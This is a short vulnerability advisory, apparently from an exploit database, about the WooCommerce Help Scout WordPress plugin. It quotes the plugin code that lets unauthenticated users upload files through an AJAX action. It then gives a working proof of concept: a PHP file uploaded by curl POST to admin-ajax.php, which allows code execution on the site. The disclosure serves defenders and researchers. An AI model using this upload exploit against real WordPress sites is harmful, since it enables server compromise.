## https://sploitus.com/exploit?id=WPEX-ID:CF9305E8-F5BC-45C3-82DB-0EF00FD46129
In file /woocommerce-help-scout/includes/class-wc-help-scout-ajax.php there is class WC_Help_Scout_Ajax
with constructor initializing action
add_action( 'wp_ajax_nopriv_wc_help_scout_upload_attachments', array( $this, 'wc_help_scout_upload_attachments' ) );
which reads uploaded $_FILES and then executes
$target_path_sia = $_FILES["file"]["name"];
move_uploaded_file($_FILES["file"]["tmp_name"],$dir. "/hstmp/" . $target_path_sia);
Ie. attacker can run
echo '<?php echo "Hello World!";' > helloworld.php
curl -X POST -F file=@helloworld.php https://<site>/wp-admin/admin-ajax.php?action=wc_help_scout_upload_attachments
to exploit this vuln.